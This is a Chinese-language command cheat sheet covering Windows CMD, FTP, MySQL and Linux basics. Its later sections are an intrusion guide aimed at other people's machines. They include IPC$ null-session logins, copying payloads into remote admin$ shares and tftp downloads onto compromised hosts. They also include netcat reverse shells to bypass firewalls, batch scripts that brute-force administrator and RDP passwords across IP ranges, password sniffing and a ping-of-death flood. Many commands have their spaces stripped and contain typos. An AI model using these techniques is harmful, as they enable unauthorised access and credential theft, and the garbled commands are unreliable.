命令簡介
CMD就是COMMAND,即命令的意思,是在WIDOWS裡進入DOS命令提示符的方法,在開始運行裡輸入CMD就能打開命令提示符。雖然随着計算機産業的發展,Windows操作系統的應用越來越廣泛,DOS面臨着被淘汰的命運,但是因為它運行安全、穩定,有的用戶還在使用,所以一般Windows的各種版本都與其兼容,用戶可以在Windows系統下運行DOS,中文版WindowsXP中的命令提示符進一步提高了與DOS下操作命令的兼容性,用戶可以在命令提示符直接輸入中文調用文件。
在9x系統下輸入command就可以打開命令行.而在NT系統上可以輸入cmd來打開,在windows2000後被cmd替代,利用CMD命令查詢系統的信息或者是判斷網絡的好壞。右圖為CMD啟動後的界面。
命令大全
1.calc-----------啟動計算器
2.certmgr.msc----證書管理實用程序
3.charmap--------啟動字符映射表
5.chkdsk.exe-----Chkdsk磁盤檢查
6.ciadv.msc------索引服務程序
7.cleanmgr-------垃圾整理
8.cliconfg-------SQLSERVER客戶端網絡實用程序
9.Clipbrd--------剪貼闆查看器
10.cmd.exe--------CMD命令提示符
11.compmgmt.msc---計算機管理
12.conf-----------啟動netmeeting
13.dcomcnfg-------打開系統組件服務
14.ddeshare-------打開DDE共享設置
15.devmgmt.msc---設備管理器
16.dfrg.msc-------磁盤碎片整理程序
17.diskmgmt.msc---磁盤管理實用程序
18.drwtsn32------系統醫生
19.dvdplay--------DVD播放器
20.dxdiag---------檢查DirectX信息
21.explorer-------打開資源管理器
22.eudcedit-------造字程序
23.eventvwr-------事件查看器
24.fsmgmt.msc-----共享文件夾管理器
25.gpedit.msc-----組策略
26.iexpress-------木馬捆綁工具,系統自帶
27.logoff---------注銷命令
28.lusrmgr.msc----本機用戶和組
29.notepad--------打開記事本
30.magnify--------放大鏡實用程序
31.mem.exe--------顯示内存使用情況
32.mmc------------打開控制台49.
33.mobsync--------同步命令
34.mplayer2-------簡易widnowsmediaplayer
35.Msconfig.exe---系統配置實用程序
36.mspaint--------畫圖闆
37.mstsc----------遠程桌面連接
38.narrator-------屏幕“講述人”
39.netstartmessenger----開始信使服務
40.netstat-an----(TC)命令檢查接口
41.netstopmessenger-----停止信使服務
42.Nslookup-------IP地址偵測器,是一個監測網絡中DNS服務器是否能正确實現域名解析的命令行工具.
它在WindowsNT/2000/XP中均可使用,但在Windows98中卻沒有集成這一個工具。
43.ntbackup-------系統備份和還原
44.ntmsmgr.msc----移動存儲管理器
45.ntmsoprq.msc---移動存儲管理員操作請求
46.odbcad32-------ODBC數據源管理器
47.oobe/msoobe/a----檢查XP是否激活
48.osk------------打開屏幕鍵盤
49.packager-------對象包裝程序
50.perfmon.msc----計算機性能監測程序
51.progman--------程序管理器
52.regedit.exe----注冊表
53.regedt32-------注冊表編輯器
54.regsvr32/u*.dll----停止dll文件運行
55.regsvr32/uzipfldr.dll------取消ZIP支持
56.rononce-p----15秒關機
57.rsop.msc-------組策略結果集
58.secpol.msc-----本地安全策略
59.services.msc---本地服務設置
60.sfc.exe--------系統文件檢查器
61sfc/scannow-----掃描錯誤并複原
62.sfc/scannow---windows文件保護
63.shrpubw--------創建共享文件夾
64.shutdown-------60秒倒計時關機命令
65.sigverif-------文件簽名驗證程序
66.sndrec32-------錄音機
67.Sndvol32-------音量控制程序
68.syncapp--------創建一個公文包
69.sysedit--------系統配置編輯器
70.syskey---------系統加密,一旦加密就不能解開,保護windowsxp系統的雙重密碼
71.taskmgr--------任務管理器
72.tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
73.utilman--------輔助工具管理器
74.wiaacmgr-------掃描儀和照相機向導
75.winchat--------XP自帶局域網聊天
76.winmsd---------系統信息
77.winver---------檢查Windows版本
78.write----------寫字闆
79.wmimgmt.msc----打開windows管理體系結構(WMI)
80.wscript--------windows腳本宿主設置
81.wupdmgr--------windows更新程序
操作詳解
netuseipipcquot;"/user:""建立IPC空鍊接
netuseipipcquot;密碼"/user:"用戶名"建立IPC非空鍊接
netuseh:ipcquot;密碼"/user:"用戶名"直接登陸後映射對方C:到本地為H:
netuseh:ipc$登陸後映射對方C:到本地為H:
netuseipipc$/del删除IPC鍊接
netuseh:/del删除映射對方到本地的為H:的映射
netuser用戶名密碼/add建立用戶
netuserguest/active:yes激活guest用戶
netuser查看有哪些用戶
netuser帳戶名查看帳戶的屬性
netlocalgroupadministrators用戶名/add把“用戶”添加到管理員中使其具有管理員權限
netstart查看開啟了哪些服務
netstart服務名開啟服務;(如:netstarttelnet,netstartschedule)
netstop服務名停止某服務
nettime目标ip查看對方時間
nettime目标ip/set設置本地計算機時間與“目标IP”主機的時間同步,加上參數/yes可取消确認信息
netview查看本地局域網内開啟了哪些共享
netviewip查看對方局域網内開啟了哪些共享
netconfig顯示系統網絡設置
netlogoff斷開連接的共享
netpause服務名暫停某服務
netsendip"文本信息"向對方發信息
netver局域網内正在使用的網絡連接類型和信息
netshare查看本地開啟的共享
netshareipc$開啟ipc$共享
netshareipc$/del删除ipc$共享
netsharec$/del删除C:共享
netuserguest12345用guest用戶登陸後用将密碼改為12345
netpassword密碼更改系統登陸密碼
netstat-a查看開啟了哪些端口,常用netstat-an
netstat-n查看端口的網絡連接情況,常用netstat-an
netstat-v查看正在進行的工作
netstat-p協議名例:netstat-ptcq/ip查看某協議使用情況
netstat-s查看正在使用的所有協議使用情況
nbtstat-Aip對方136到139其中一個端口開了的話,就可查看對方最近登陸的用戶名
tracert-參數ip(或計算機名)跟蹤路由(數據包),參數:“-w數字”用于設置超時間隔。
pingip(或域名)向對方主機發送默認大小為32字節的數據,參數:“-l[空格]數據包大小”;“-n發送數據次數”;“-t”指一直ping。
ping-t-l65500ip死亡之ping(發送大于64K的文件并一直ping就成了死亡之ping)
ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用參數“/all”顯示全部配置信息
tlist-t以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾内)
kill-F進程名加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾内)
del-F文件名加-F參數後就可删除隻讀文件,/AR、/AH、/AS、/AA分别表示删除隻讀、隐藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示删除除隻讀、隐藏、系統、存檔以外的文件。例如“DEL/AR*.*”表示删除當前目錄下所有隻讀文件,“DEL/A-S*.*”表示删除當前目錄下除系統文件以外的所有文件
del/S/Q目錄或用:rmdir/s/Q目錄/S删除目錄及目錄下的所有子目錄和文件。同時使用參數/Q可取消删除操作時的系統确認就直接删除。(二個命令作用相同)
move盤符路徑要移動的文件名存放移動文件的路徑移動後文件名移動文件,用參數/y将取消确認移動目錄存在相同文件的提示就直接複蓋
fcone.txttwo.txt>3st.txt對比二個文件并把不同之處輸出到3st.txt文件中,">"和">>"是重定向命令
atid号開啟已注冊的某個計劃任務
at/delete停止所有計劃任務,用參數/yes則不需要确認就直接停止
atid号/delete停止某個已注冊的計劃任務
at查看所有的計劃任務
atiptime程序名(或一個命令)/r在某時間運行對方某程序并重新啟動計算機
fingerusername@host查看最近有哪些用戶登陸
telnetip端口遠程登陸服務器,默認端口為23
openip連接到IP(屬telnet登陸後的命令)
telnet在本機上直接鍵入telnet将進入本機的telnet
copy路徑文件名1路徑文件名2/y複制文件1到指定的目錄為文件2,用參數/y就同時取消确認你要改寫一份現存目錄文件
copyc:srv.exeipadmin$複制本地c:srv.exe到對方的admin下
copy1st.jpg/b+2st.txt/a3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
copyipadmin$svv.exec:或:copyipadmin$*.*複制對方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy要複制的文件或目錄樹目标地址目錄名複制文件和目錄樹,用參數/Y将不提示複蓋相同文件
用參數/e才可連目錄下的子目錄一起複制到目标地址下。
tftp-i自己IP(用肉機作跳闆時這用肉機IP)getserver.exec:server.exe登陸後,将“IP”的server.exe下載到目标主機c:server.exe參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i則以ASCII模式(傳送文本文件模式)進行傳送
tftp-i對方IPputc:server.exe登陸後,上傳本地c:server.exe至主機
ftpip端口用于上傳文件至服務器或進行文件操作,默認端口為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
routeprint顯示出IP路由,将主要顯示網絡地址Networkaddres,子網掩碼Netmask,網關地址Gatewayaddres,接口地址Interface
arp查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp-a将顯示出全部信息
start程序名或命令/max或/min新開一個新窗口并最大化(最小化)運行某程序或命令
mem查看cpu使用情況
attrib文件名(目錄名)查看某文件(目錄)的屬性
attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存檔,隻讀,系統,隐藏屬性;用+則是添加為某屬性
dir查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date/t、time/t使用此參數即“DATE/T”、“TIME/T”将隻顯示當前日期和時間,而不必輸入新日期和時間
set指定環境變量名稱=要指派給變量的字符設置環境變量
set顯示當前所有的環境變量
setp(或其它字符)顯示出當前以字符p(或其它字符)開頭的所有環境變量
pause暫停批處理程序,并顯示出:請按任意鍵繼續....
if在批處理程序中執行條件處理(更多說明見if命令及變量)
goto标簽将cmd.exe導向到批處理程序中帶标簽的行(标簽必須單獨一行,且以冒号打頭,例如:“:start”标簽)
call路徑批處理文件名從批處理程序中調用另一個批處理程序(更多說明見call/?)
for對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變量)
echoon或off打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo信息在屏幕上顯示出信息
echo信息>>pass.txt将"信息"保存到pass.txt文件中
findstr"Hello"aa.txt在aa.txt文件中尋找字符串hello
find文件名查找某文件
title标題名字更改CMD窗口标題名字
color顔色值設置cmd控制台前景和背景顔色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt名稱更改cmd.exe的顯示的命令提示符(把C:、D:統一改為:EntSky)
ver在DOS窗口下顯示版本信息
winver彈出一個窗口顯示版本信息(内存大小、系統版本、補丁版本、計算機名)
format盤符/FS:類型格式化磁盤,類型:FAT、FAT32、NTFS,例:FormatD:/FS:NTFS
md目錄名創建目錄
replace源文件要替換文件的目錄替換文件
ren原文件名新文件名重命名文件名
tree以樹形結構顯示出目錄,用參數-f将列出第個文件夾中文件名稱
type文件名顯示文本文件的内容
more文件名逐屏顯示輸出文件
doskey要鎖定的命令=字符
doskey要解鎖命令=為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,并創建宏)。如:鎖定dir命令:doskeydir=entsky(不能用doskeydir=dir);解鎖:doskeydir=
taskmgr調出任務管理器
chkdsk/FD:檢查磁盤D并顯示狀态報告;加參數/f并修複磁盤上的錯誤
tlntadmntelnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認端口23為其它任何端口
exit退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exe
path路徑可執行文件的文件名為可執行文件設置一個路徑。
cmd啟動一個win2K命令解釋窗口。參數:/eff、/en關閉、開啟命令擴展;更我詳細說明見cmd/?
regedit/s注冊表文件名導入注冊表;參數/S指安靜模式導入,無任何提示;
regedit/e注冊表文件名導出注冊表
cacls文件名參數顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D用戶名:設定拒絕某用戶訪問;/P用戶名:perm替換指定用戶的訪問權限;/G用戶名:perm賦予指定用戶訪問權限;Perm可以是:N無,R讀取,W寫入,C更改(寫入),F完全控制;例:caclsD:est.txt/Dpub設定d:est.txt拒絕pub用戶訪問。
cacls文件名查看文件的訪問用戶權限列表
REM文本内容在批處理文件中添加注解
netsh查看或更改本地網絡配置情況
IIS服務命令
iisreset/reboot重啟win2k計算機(但有提示系統将重啟信息出現)
iisreset/start或stop啟動(停止)所有Internet服務
iisreset/restart停止然後重新啟動所有Internet服務
iisreset/status顯示所有Internet服務狀态
iisreset/enable或disable在本地系統上啟用(禁用)Internet服務的重新啟動
iisreset/rebootonerror當啟動、停止或重新啟動Internet服務時,若發生錯誤将重新開機
iisreset/noforce若無法停止Internet服務,将不會強制終止Internet服務
iisreset/timeoutVal在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦将會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。
FTP命令:(後面有詳細說明内容)
ftp的命令行格式為:
ftp-v-d-i-n-g[主機名]-v顯示遠程服務器的所有響應信息。
-d使用調試方式。
-n限制ftp的自動登錄,即不使用.netrc文件。
-g取消全局文件名。
help[命令]或?[命令]查看命令說明
bye或quit終止主機FTP進程,并退出FTP管理方式.
pwd列出當前遠端主機目錄
put或send本地文件名[上傳到主機上的文件名]将本地一個文件傳送至遠端主機中
get或recv[遠程主機文件名][下載到本地後的文件名]從遠端主機中傳送至本地主機中
mget[remote-files]從遠端主機接收一批文件至本地主機
mputlocal-files将本地主機中一批文件傳送至遠端主機
dir或ls[remote-directory][local-file]列出當前遠端主機目錄中的文件.如果有本地文件,就将結果寫至本地文件
ascii設定以ASCII方式傳送文件(缺省值)
bin或image設定以二進制方式傳送文件
bell每完成一次文件傳送,報警提示
cdup返回上一級目錄
close中斷與遠程服務器的ftp會話(與open對應)
openhost[port]建立指定ftp服務器連接,可指定連接端口
delete删除遠端主機中的文件
mdelete[remote-files]删除一批文件
mkdirdirectory-name在遠端主機中建立目錄
rename[from][to]改變遠端主機中的文件名
rmdirdirectory-name删除遠端主機中的目錄
status顯示當前FTP的狀态
system顯示遠端主機系統類型
useruser-name[password][account]重新以别的用戶名登錄遠端主機
openhost[port]重新建立一個新的連接
prompt交互提示模式
macdef定義宏命令
lcd改變當前本地主機的工作目錄,如果缺省,就轉到當前用戶的HOME目錄
chmod改變遠端主機的文件權限
case當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cdremote-dir進入遠程主機目錄
cdup進入遠程主機目錄的父目錄
!在本地機中執行交互shell,exit回到ftp環境,如!ls*.zip
#5
MYSQL命令
mysql-h主機地址-u用戶名-p密碼連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的。
(例:mysql-h110.110.110.110-Uroot-P123456
注:u與root可以不用加空格,其它也一樣)
exit退出MYSQL
mysqladmin-u用戶名-p舊密碼password新密碼修改密碼
grantselecton數據庫.*to用戶名@登錄主機identifiedby"密碼";增加新用戶。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以後面都帶一個分号作為命令結束符)
showdatabases;顯示數據庫列表。剛開始時才兩個數據庫:mysql和test。mysql庫很重要它裡面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是用這個庫進行操作。
usemysql;
showtables;顯示庫中的數據表
describe表名;顯示數據表的結構
createdatabase庫名;建庫
use庫名;
createtable表名(字段設定列表);建表
dropdatabase庫名;
droptable表名;删庫和删表
deletefrom表名;将表中記錄清空
select*from表名;顯示表中的記錄
mysqldump--optschool>school.bbb備份數據庫:(命令在DOS的mysqlin目錄下執行);注釋:将數據庫school備份到school.bbb文件,school.bbb是一個文本文件,文件名任取,打開看看你會有新發現。
win2003系統下新增命令(實用部份):
shutdown/參數關閉或重啟本地或遠程主機。
參數說明:/S關閉主機,/R重啟主機,/T數字設定延時的時間,範圍0~180秒之間,/A取消開機,/M//IP指定的遠程主機。
例:shutdown/r/t0立即重啟本地主機(無延時)
taskkill/參數進程名或進程的pid終止一個或多個任務和進程。
參數說明:/PID要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM要終止的進程的進程名,/F強制終止進程,/T終止指定的進程及他所啟動的子進程。
tasklist顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程标識符(PID)。
參數說明:/M列出當前進程加載的dll文件,/SVC顯示出每個進程對應的服務,無參數時就隻列出當前的進程。
Linux系統下基本命令注:要區分大小寫
uname顯示版本信息(同win2K的ver)
dir顯示當前目錄文件,ls-al顯示包括隐藏文件(同win2K的dir)
pwd查詢當前所在的目錄位置
cdcd..回到上一層目錄,注意cd與..之間有空格。cd/返回到根目錄。
cat文件名查看文件内容
cat>abc.txt往abc.txt文件中寫上内容。
more文件名以一頁一頁的方式顯示一個文本文件。
cp複制文件
mv移動文件
rm文件名删除文件,rm-a目錄名删除目錄及子目錄
mkdir目錄名建立目錄
rmdir删除子目錄,目錄内沒有文檔。
chmod設定檔案或目錄的存取權限
grep在檔案中查找字符串
diff檔案文件比較
find檔案搜尋
date現在的日期、時間
who查詢目前和你使用同一台機器的人以及Login時間地點
w查詢目前上機者的詳細資料
whoami查看自己的帳号名稱
groups查看某人的Group
passwd更改密碼
history查看自己下過的命令
ps顯示進程狀态
kill停止某進程
gcc黑客通常用它來編譯C語言寫的文件
su權限轉換為指定使用者
telnetIPtelnet連接對方主機(同win2K),當出現bash$時就說明連接成功。
ftpftp連接上某服務器(同win2K)
1:for命令及變量基本格式
FOR/參數%variableIN(set)DOcommand[command_parameters]%variable:指定一個單一字母可替換的參數,如:%i,而指定一個變量則用:%%i,而調用變量時用:%i%,變量是區分大小寫的(%i不等于%I)。
批處理每次能處理的變量從%0—%9共10個,其中%0默認給批處理文件名使用,%1默認為使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:netuseipipc$pass/user:user中ip為%1,pass為%2,user為%3
(set):指定一個或一組文件,可使用通配符,如:(D:user.txt)和(11254)(1-1254),{“(11254)”第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;“(1-1254)”說明:即從254到1}
command:指定對第個文件執行的命令,如:netuse命令;如要執行多個命令時,命令這間加:&來隔開
command_parameters:為特定命令指定參數或命令行開關
IN(set):指在(set)中取值;DOcommand:指執行command
參數:/L指用增量形式{(set)為增量形式時};/F指從文件中不斷取值,直到取完為止{(set)為文件時,如(d:pass.txt)時}。
用法舉例:
@echooff
echo用法格式:test.bat*.*.*>test.txt
for/L%%Gin(11254)doecho%1.%%G>>test.txt&netuse%1.%%G/user:administrator|find"命令成功完成">>test.txt
存為test.bat說明:對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理默認的%1;%%G為變量(ip的最後一位);&用來隔開echo和netuse這二個命令;|指建立了ipc$後,在結果中用find查看是否有"命令成功完成"信息;%1.%%G為完整的IP地址;(11254)指起始值,增長量,結止值。
@echooff
echo用法格式:ok.batip
FOR/F%%iIN(D:user.dic)DOsmb.exe%1%%iD:pass.dic200
存為:ok.exe說明:輸入一個IP後,用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼,直到文件中值取完為止。%%i為用戶名;%1為輸入的IP地址(默認)。
七:
2:if命令及變量基本格式
IF[not]errorlevel數字命令語句如果程序運行最後返回一個等于或大于指定數字的退出編碼,指定條件為“真”。
例:IFerrorlevel0命令指程序執行後返回的值為0時,就值行後面的命令;IFnoterrorlevel1命令指程序執行最後返回的值不等于1,就執行後面的命令。
0指發現并成功執行(真);1指沒有發現、沒執行(假)。
IF[not]字符串1==字符串2命令語句如果指定的文本字符串匹配(即:字符串1等于字符串2),就執行後面的命令。
例:“if"%2%"=="4"gotostart”指:如果輸入的第二個變量為4時,執行後面的命令(注意:調用變量時就%變量名%并加"")
IF[not]exist文件名命令語句如果指定的文件名存在,就執行後面的命令。
例:“ifnotnc.exegotoend”指:如果沒有發現nc.exe文件就跳到":end"标簽處。
IF[not]errorlevel數字命令語句else命令語句或IF[not]字符串1==字符串2命令語句else命令語句或IF[not]exist文件名命令語句else命令語句加上:else命令語句後指:當前面的條件不成立時,就指行else後面的命令。注意:else必須與if在同一行才有效。當有del命令時需把del命令全部内容用<>括起來,因為del命令要單獨一行時才能執行,用上<>後就等于是單獨一行了;例如:“ifexisttest.txt.elseechotest.txt.missing”,注意命令中的“.”
注:系統外部命令(均需下載相關工具)
瑞士軍刀:nc.exe
參數說明:
-h查看幫助信息
-d後台模式
-eprog程序重定向,一但連接就執行[危險]
-isecs延時的間隔
-l監聽模式,用于入站連接
-L監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-nIP地址,不能用域名
-ofilm記錄16進制的傳輸
-p[空格]端口本地端口号
-r随機本地及遠程端口
-t使用Telnet交互方式
-uUDP模式
-v詳細輸出,用-vv将更詳細
-w數字timeout延時間隔
-z将輸入,輸出關掉(用于掃錨時)
基本用法:
nc-nvv192.168.0.180連接到192.168.0.1主機的80端口
nc-l-p80開啟本機的TCP80端口并監聽
nc-nvv-w2-z192.168.0.180-1024掃錨192.168.0.1的80-1024端口
nc-l-p5354-t-ec:winntsystem32cmd.exe綁定remote主機的cmdshell在remote的TCP5354端口
nc-t-ec:winntsystem32cmd.exe192.168.0.25354梆定remote主機的cmdshell并反向連接192.168.0.2的5354端口
高級用法:
nc-L-p80作為蜜罐用1:開啟并不停地監聽80端口,直到CTR+C為止
nc-L-p80>c:log.txt作為蜜罐用2:開啟并不停地監聽80端口,直到CTR+C,同時把結果輸出到c:log.txt
nc-L-p80
type.exec:honeyport|nc-L-p80作為蜜罐用3-2:開啟并不停地監聽80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到傳送文件作用
本機上用:nc-l-p本機端口
在對方主機上用:nc-ecmd.exe本機IP-p本機端口*win2K
nc-e/bin/sh本機IP-p本機端口*linux,unix反向連接突破對方主機的防火牆
本機上用:nc-d-l-p本機端口<要傳送的文件路徑及名稱
在對方主機上用:nc-vv本機IP本機端口>存放文件的路徑及名稱傳送文件到對方主機
備注:
|管道命令
<或>重定向命令。“<;”,例如:tlntadmn
@表示執行@後面的命令,但不會顯示出來(後台執行);例:@dirc:winnt>>d:log.txt意思是:後台執行dir,并把結果存在d:log.txt中
>與>>的區别">"指:複蓋;">>"指:保存到(添加到)。
如:@dirc:winnt>>d:log.txt和@dirc:winnt>d:log.txt二個命令分别執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則隻有一次的結果,是因為第二次的結果把第一次的複蓋了。
八:
掃描工具:xscan.exe
基本格式
xscan-host<;起始IP>[-<;終止IP>]<;檢測項目>[其他選項]掃錨"起始IP到終止IP"段的所有主機信息
xscan-file<;主機列表文件名><;檢測項目>[其他選項]掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active檢測主機是否存活
-os檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port檢測常用服務的端口狀态
-ftp檢測FTP弱口令
-pub檢測FTP服務匿名用戶寫權限
-pop3檢測POP3-Server弱口令
-smtp檢測SMTP-Server漏洞
-sql檢測SQL-Server弱口令
-smb檢測NT-Server弱口令
-iis檢測IIS編碼/解碼漏洞
-cgi檢測CGI漏洞
-nasl加載Nessus攻擊腳本
-all檢測以上所有項目
其它選項
-i适配器編号設置網絡适配器,<;适配器編号>可通過"-l"參數獲取
-l顯示所有網絡适配器
-v顯示詳細掃描進度
-p跳過沒有響應的主機
-o跳過沒有檢測到開放端口的主機
-t并發線程數量,并發主機數量指定最大并發線程數量和并發主機數量,默認數量為100,10
-log文件名指定掃描報告文件名(後綴為:TXT或HTML格式的文件)
用法示例
xscan-host192.168.1.1-192.168.255.255-all-active-p檢測192.168.1.1-192.168.255.255網段内主機的所有漏洞,跳過無響應的主機
xscan-host192.168.1.1-192.168.255.255-port-smb-t150-o檢測192.168.1.1-192.168.255.255網段内主機的标準端口狀态,NT弱口令用戶,最大并發線程數量為150,跳過沒有檢測到開放端口的主機
xscan-filehostlist.txt-port-cgi-t200,5-v-o檢測“hostlist.txt”文件中列出的所有主機的标準端口狀态,CGI漏洞,最大并發線程數量為200,同一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放端口的主機
九:
可捕獲局域網内FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp輸出TCP數據報
-udp輸出UDP數據報
-icmp輸出ICMP數據報
-pass過濾密碼信息
-hide後台運行
-host解析主機名
-addrIP地址過濾IP地址
-port端口過濾端口
-log文件名将輸出保存到文件
-asc以ASCII形式輸出
-hex以16進制形式輸出
用法示例
xsniff.exe-pass-hide-logpass.log後台運行嗅探密碼并将密碼信息保存在pass.log文件中
xsniff.exe-tcp-udp-asc-addr192.168.1.1嗅探192.168.1.1并過濾tcp和udp信息并以ASCII格式輸出
終端服務密碼破解:tscrack.exe
參數說明
-h顯示使用幫助
-v顯示版本信息
-s在屏幕上打出解密能力
-b密碼錯誤時發出的聲音
-t同是發出多個連接(多線程)
-NPreventSystemLogentriesontargetedserver
-U卸載移除tscrack組件
-f使用-f後面的密碼
-F間隔時間(頻率)
-l使用-l後面的用戶名
-w使用-w後面的密碼字典
-p使用-p後面的密碼
-D登錄主頁面
用法示例
tscrack192.168.0.1-ladministrator-wpass.dic遠程用密碼字典文件暴破主機的administrator的登陸密碼
tscrack192.168.0.1-ladministrator-p123456用密碼123456遠程登陸192.168.0.1的administrator用戶
@ifnotexistipcscan.txtgotonoscan
@for/f"tokens=1delims="%%iin(3389.txt)docallhack.bat%%i
nscan
@echo3389.txtnofindorscanfaild
(①存為3389.bat)(假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接着運行hack.bat
@ifnotexisttscrack.exegotonoscan
@tscrack%1-ladministrator-wpass.dic>>rouji.txt
:noscan
@echotscrack.exenofindorscanfaild
(②存為hack.bat)(運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼,并将破解結果保存在rouji.txt文件中。
其它
Shutdown.exe
ShutdownIP地址t:2020秒後将對方NT自動關閉(Windows2003系統自帶工具,在Windows2000下用進就得下載此工具才能用。在前面Windows2003DOS命令中有詳細介紹。)
fpipe.exe(TCP端口重定向工具)在第二篇中有詳細說明(端口重定向繞過防火牆)
fpipe-l80-s1029-r80當有人掃錨你的80端口時,他掃到的結果會完全是的主機信息
Fpipe-l23-s88-r23目标IP把本機向目标IP發送的23端口Telnet請求經端口重定向後,就通過88端口發送到目标IP的23端口。(與目标IP建立Telnet時本機就用的88端口與其相連接)然後:直接Telnet127.0.0.1(本機IP)就連接到目标IP的23端口了。
OpenTelnet.exe(遠程開啟telnet工具)
opentelnet.exeIP帳号密碼ntlm認證方式Telnet端口(不需要上傳ntlm.exe破壞微軟的身份驗證方式)直接遠程開啟對方的telnet服務後,就可用telnetip連接上對方。
NTLM認證方式:0:不使用NTLM身份驗證;1:先嘗試NTLM身份驗證,如果失敗,再使用用戶名和密碼;2:隻使用NTLM身份驗證。
ResumeTelnet.exe(OpenTelnet附帶的另一個工具)
resumetelnet.exeIP帳号密碼用Telnet連接完對方後,就用這個命令将對方的Telnet設置還原,并同時關閉Telnet服務。
FTP命令詳解
FTP命令是Internet用戶使用最頻繁的命令之一,熟悉并靈活應用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想學習使用進行後台FTP下載,那麼就必須學習FTP指令。
FTP的命令行格式為:
ftp-v-d-i-n-g[主機名],其中
-v顯示遠程服務器的所有響應信息
-n限制ftp的自動登錄,即不使用;.netrc文件;
-d使用調試方式;
-g取消全局文件名。
FTP使用的内部命令如下(中括号表示可選項):
1.![cmd[args]]:在本地機中執行交互shell,exit回到ftp環境,如:!ls*.zip
2.$macro-ame[args]:執行宏定義macro-name。
3.account[password]:提供登錄遠程系統成功後訪問系統資源所需的補充口令。
4.appendlocal-file[remote-file]:将本地文件追加到遠程系統主機,若未指定遠程系統文件名,則使用本地文件名。
5.ascii:使用ascii類型傳輸方式。
6.bell:每個命令執行完畢後計算機響鈴一次。
7.bin:使用二進制文件傳輸方式。
8.bye:退出ftp會話過程。
9.case:在使用mget時,将遠程主機文件名中的大寫轉為小寫字母。
10.cdremote-dir:進入遠程主機目錄。
11.cdup:進入遠程主機目錄的父目錄。
12.chmodmodefile-name:将遠程主機文件file-name的存取方式設置為mode,如:chmod777a.out。
13.close:中斷與遠程服務器的ftp會話(與open對應)。
14.cr:使用asscii方式傳輸文件時,将回車換行轉換為回行。
15.deleteremote-file:删除遠程主機文件。
16.debug[debug-value]:設置調試方式,顯示發送至遠程主機的每條命令,如:debup3,若設為0,表示取消debug。
17.dir[remote-dir][local-file]:顯示遠程主機目錄,并将結果存入本地文件。
18.disconnection:同close。
19.formformat:将文件傳輸方式設置為format,缺省為file方式。
20.getremote-file[local-file]:将遠程主機的文件remote-file傳至本地硬盤的local-file。
21.glob:設置mdelete,mget,mput的文件名擴展,缺省時不擴展文件名,同命令行的-g參數。
22.hash:每傳輸1024字節,顯示一個hash符号(#)。
23.help[cmd]:顯示ftp内部命令cmd的幫助信息,如:helpget。
24.idle[seconds]:将遠程服務器的休眠計時器設為[seconds]秒。
25.image:設置二進制傳輸方式(同binary)。
26.lcd[dir]:将本地工作目錄切換至dir。
27.ls[remote-dir][local-file]:顯示遠程目錄remote-dir,并存入本地文件local-file。
28.macdefmacro-name:定義一個宏,遇到macdef下的空行時,宏定義結束。
29.mdelete[remote-file]:删除遠程主機文件。
30.mdirremote-fileslocal-file:與dir類似,但可指定多個遠程文件,如:mdir*.o.*.zipoutfile。
31.mgetremote-files:傳輸多個遠程文件。
32.mkdirdir-name:在遠程主機中建一目錄。
33.mlsremote-filelocal-file:同nlist,但可指定多個文件名。
34.mode[modename]:将文件傳輸方式設置為modename,缺省為stream方式。
35.modtimefile-name:顯示遠程主機文件的最後修改時間。
36.mputlocal-file:将多個文件傳輸至遠程主機。
